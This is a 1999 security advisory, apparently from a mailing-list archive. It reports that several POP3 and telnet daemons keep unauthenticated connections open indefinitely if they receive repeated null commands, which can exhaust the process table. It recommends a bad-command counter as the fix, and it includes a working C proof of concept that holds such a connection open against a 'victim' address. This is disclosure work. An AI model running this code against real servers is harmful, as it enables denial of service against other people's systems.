~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet
http://www.security.kki.pl http://www.kki.pl
mailto:securityat_private mailto:biuroat_private
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Raport title : Flaws in implementations of mechanisms which
prevents from maintaining the parasitize connections
in many tcp network services.
Problem found by : Lukasz Luzar (lluzarat_private)
Raport created by : Robert Pajak (shadowat_private)
Lukasz Luzar (lluzarat_private)
Raport published : 28 April 1999
Raport code : KKIS.28041999.002.b
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
Systems affected : Linux, FreeBSD, Solaris, ...
Archive : http://www.security.kki.pl/advisories/
Risk level : low
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The designers of many popular network services are trying to make the
mechanisms which should prevents from maintaining the parasitize connections
to their programs.
The exercise of such protection is timeout, which closes inactive
connections.
But some of those designers forgets that some malicious guys may often
and fraquently send strings full of bad or null commands to the open port
of the service. Such situation might happen before login/password
authentication of the connection.
Those programmers should implement additional mechanisms to prevent such
situations. Good solution is to put counter of bad (or null) commands
inside the program.
For example, the similiar mechanism has been applied in sendmail.
This soluition is effective and very easy to implement.
Lack of this mechanism may be quite threateing, because most of that tcp
services are working with root privilages, and the bounds of amount of root
proceses isn't easy, when the service has no internal bound.
That affects whole system, when proccess table is fulfiled for
example by multiply open connections to the vulnerable tcp service.
Worst situation is, when vulnerable service doesn't logs any information
about connection before authentication with login/password.
One of this most vulnerable services is cucipop.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below example shows how to open and maintain the connection,
which might state open by undefined time.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
* example.c by Lukasz Luzar (lluzarat_private)
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* victim's address and port of service */
#define ADDR "10.0.0.1" //IP in dot natation
#define PORT 110 //e.g. some pop3
#define DELAY 4 //(4 secs.) how often we are sending bad commands
#define COMMAND "\n" //some bad (or null) command
void main()
{
int sockfd,
j,k;
struct sockaddr_in victim_addr;
bzero((char *) &victim_addr, sizeof( victim_addr));
victim_addr.sin_family = AF_INET;
victim_addr.sin_addr.s_addr = inet_addr( ADDR);
victim_addr.sin_port = htons( PORT);
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
fprintf( stderr, "socket error\n");
if( connect( sockfd,(struct sockaddr*) &victim_addr,
sizeof( victim_addr)) < 0)
fprintf( stderr,"connect error\n");
k = 1;
if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)
fprintf( stderr,"setsockopt error\n");
j = strlen( COMMAND);
for(;;) {
if( write( sockfd,COMMAND,j) == -1)
fprintf( stderr,"write error\n");
fprintf( stderr,".");
sleep( DELAY);
}
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:securityat_private
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:13 PDT